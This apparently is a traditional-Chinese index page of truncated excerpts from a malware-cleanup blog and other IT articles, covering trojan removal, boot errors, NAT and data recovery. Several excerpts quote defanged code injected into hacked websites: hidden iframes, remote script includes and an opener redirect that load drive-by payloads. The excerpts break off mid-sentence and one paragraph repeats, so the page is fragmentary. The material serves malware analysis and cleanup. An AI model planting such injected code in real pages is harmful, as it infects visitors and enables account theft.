其他

 purpleendurer註：在新浪網看到下文：三問瑞星：瑞星發現了在實驗室中的病毒？(見:http://forum.tech.sina.com.cn/cgi-bin/viewone.cgi?gid=23&fid=290&itemid=27156)作者：jinleiviva　　發表日期：2005-05-19

endurer　原創2006-10-01　第1版QQ自動發送的資訊為：/-------hxxp://d***dkill.chaoku***ai.com/12***3.html這裡有我的照片歡迎大家來捧下場！謝謝啊-------/點擊開啟hxxp://d***dkill.chaoku***ai.com/12***3.html後，會開啟標題為：Oh,my god!   Goldsun[at]８４８２３７１４，內容為：You DO

遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1endurer 原創2007-08-14 第1版昨晚一位網友說他的電腦中了病毒，金山毒霸不停的提示發現病毒WinForm2.dll，使用一段時間後會彈出倒計時關機對話方塊，讓偶通過QQ遠程協助。讓網友重啟到帶網路連接的安全模式，剛連上就出現了倒計時關機對話方塊，用shutdown -a命令停止了。下載 pe_xscan 掃描 log

　　當我們用HijackThis、pe_xscan等系統分析軟體發現可疑檔案，或者發現病毒檔案時，要把這些位於不同檔案夾的可疑檔案和病毒檔案分別設定密碼壓縮打包，即使是寫一個BAT檔案也比較麻煩！現在好了，用“檔案批處理器 / bat_do”可以方便地為我們完成這些工作！0、目錄===========1、程式基本資料2、版本更新記錄3、程式介面4、開發緣由5、聲明6、使用說明7、8、聯絡作者1、程式基本資料===========作　　者：紫郢劍俠|Purple Endurer開發環境：MASM3

　　當我們用HijackThis、pe_xscan等系統分析軟體發現可疑檔案，或者發現病毒檔案時，要把這些位於不同檔案夾的可疑檔案和病毒檔案分別設定密碼壓縮打包，即使是寫一個BAT檔案也比較麻煩！現在好了，用“檔案批處理器 / bat_do”可以方便地為我們完成這些工作！0、目錄===========1、程式基本資料2、版本更新記錄3、程式介面4、開發緣由5、聲明6、使用說明7、8、聯絡作者1、程式基本資料===========作　　者：紫郢劍俠|Purple Endurer開發環境：MASM3

RootKit.Win32.Agent,Trojan.PSW.Win32.GameOnline,Trojan.Win32.Mnless等4endurer 原創2007-12-10 第1版病毒在運行時，往往會定期重寫啟動項，因此在沒清除病毒的情況下，僅僅刪除病毒啟動項是不夠的。讓網友卸載 迅雷，PPStream重啟電腦到安全模式，再用 IceSword

電腦辦公存在的最大風險莫過於資料丟失，辛勤勞作的結果往往只因為一個小小的失誤而付諸東流;因此，掌握一定的資料恢複知識是每一個電腦辦公人員都需具備的技術素質。然而，什麼是資料恢複、資料丟失之後怎樣才能恢複?面對種種疑問下的資料恢複工作，你知道怎麼應對嗎?問:上次我在整理系統時，誤將一個系統檔案刪除了，導致電腦運行不正常，請問有沒有辦法恢複?答:如果檔案被刪到資源回收筒，可以通過資源回收筒的還原功能來恢複:開啟“資源回收筒”，並選中被刪的檔案;然後單擊“資源回收筒任務”欄中的“還原此項目”即可。如果

http://article.pchome.net/2003/06/21/10332.htm常見WinXP啟動故障及解決方案 作者: 網友 日期: 2003-06-22 1、NTLDR is missing當你從Win9X升級到Windows XP的時候1)、Clone以後的問題：當你想把使用Clone製作的Win9x升級到Windows XP，那麼很容易出現一句提示：NTLDR is

作者： techrepublic.com.com Mike Mullins解釋了為什麼你應當對網路部署網路位址轉譯。以下給出了需要考慮的一些問題。 如果你所管理的網路有足夠的IP地址來覆蓋主機和伺服器，那麼你很可能不會需要配置網路位址轉譯（Network Address Translation即NAT）。NAT允許在私人網路和網際網路之間放置單個裝置以扮演代理角色，由此使用單個的可路由的IP地址來代表多台電腦。

資訊源:瑞星社區 作者:hotboy      二、清除惡意代碼的準備工作     這一節將對防範和解決惡意代碼所應做的準備提供指導。     1、解決惡意代碼的準備工作     * 使使用者警惕惡意代碼：這包括使使用者對惡意代碼的繁殖和感染癥狀有一定瞭解。以講座的形式使使用者瞭解惡意代碼的危害性。    * 閱讀反病毒軟體廠商的病毒通告：與反病毒廠商約定，以便及時擷取最新的病毒資訊的郵件。    

endurer　原創2006-09-20　第1版 有位網友的網遊帳號被盜了，讓我幫忙檢查一下。該網友的電腦使用的是Win XP

endurer 原創2007-06-07 第1版有網友說他的電腦開啟某個網站後不久，殺毒軟體的即時監控被關閉，系統時間被修改，接著安裝各種網路遊戲和聊天帳號的盜號木馬。檢查該網站首頁代碼，發現：/---if(parent.window.opener) parent.window.opener.location＝'hxxp://aa***a.sqr***s11**0.com/';……（略）……＜SCRIPT src＝"hxxp://m***a.china**s*es*e.net/top.js"＞＜

endurer　原創2006-09-21　第1版該網站首頁被加入代碼：/--------＜script language="JavaScript" src="hxxp://www***.zhu**jiang***q*h*.com/images/ad.js"＞＜/script＞--------/ad.js　的內容為：/--------document.write("＜iframe src=hxxp://www***.zhu**jiang***q*h*.com/images/ad***.htm

RootKit.Win32.Agent,Trojan.PSW.Win32.GameOnline,Trojan.Win32.Mnless等3endurer 原創2007-12-09 第1版　　網友說他進入案頭後，按提示設定了瑞星，並立即進行升級，然後開啟網頁測試是否正常，不料系統卡了一會，又出現了pps出錯的提示，然後升級中的瑞星消失了，手動啟動瑞星，提示ccenter.exe、rav.exe 程式出錯，硬碟燈長亮……　　網友只好強制重啟到帶網路連接的安全模式，運行卡卡安全助手，檢查[進階功能]—

by  David Davis CCIE, MCSE+I, SCSA  |  More from David Davis CCIE, MCSE+I, SCSA  |  Published: 5/26/05 Category: Home  |  Audience: Networking & Communications Takeaway: It's critical that all devices on an organization's network display the

來源：http://www.xfocus.net/articles/200505/798.html建立時間：2005-05-10文章屬性：原創文章提交：LionD8 (liond8_at_126.com)核心級利用通用Hook函數方法檢測進程作者：    LionD8QQ：    10415468Email： LionD8@126.comBlog：    http://blog.csdn.net/LionD8     or http://liond8.126.com介紹通用Hook的一點思想： 

遭遇HBKernel32.sys,53u1ttMe.2ys,HBTL.dll,HBSO2.dll,bcejnmfd.dll等1 endurer 原創2008-10-16 第1版 昨天，一位同事說他的電腦開機後案頭一片空白，工作列和案頭表徵圖都未顯示。請偶幫忙檢修。在同事的電腦上開啟工作管理員檢查，沒有發現可疑的進程，而且explorer.exe已經運行了。先把explorer.exe進程終止掉，然後再運行explorer.exe，不料工作管理員假死。嘗試運行cmd.exe，WinRAR.exe，

endurer 原創2007-04-26 第1版植入代碼為：/---＜IFRAME src="hxxp://www.hao12**3**hao1**23.cn/ok/index.htm" frameBorder=0 width=0 height=0＞＜/IFRAME＞---/hxxp://www.hao12**3**hao1**23.cn/ok/index.htm 標題為：愛戀千雪，包含代碼：/---＜iframe src="hxxp://www.qq5***13.cn/bbs/177***1.

遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等2endurer 原創2007-08-14 第1版（繼1）禁用系統還原功能。開啟工作管理員，終止以下進程：xyhins.exe、jzgins.exe、qhcins.exe、ztmins.exe、qjeins.exe、zxgins.exe、jhains.exe。到 http://purpleendurer.ys168.com 下載了

偶遇/Program Files/Logonui/Logonui.exe,1CC3706C.EXE,dmmuykip.sysendurer 原創2007-11-16 第1版剛才一位網友說他的電腦現在工作速度很慢，有時會彈出廣告，讓偶通過QQ遠程協助。讓網友以帶網路連接的安全模式啟動，下載 pe_xscan 掃描 log，發現如下可疑項：/===pe_xscan 07-08-30 by Purple Endurer2007-11-16 20:44:33Windows XP Service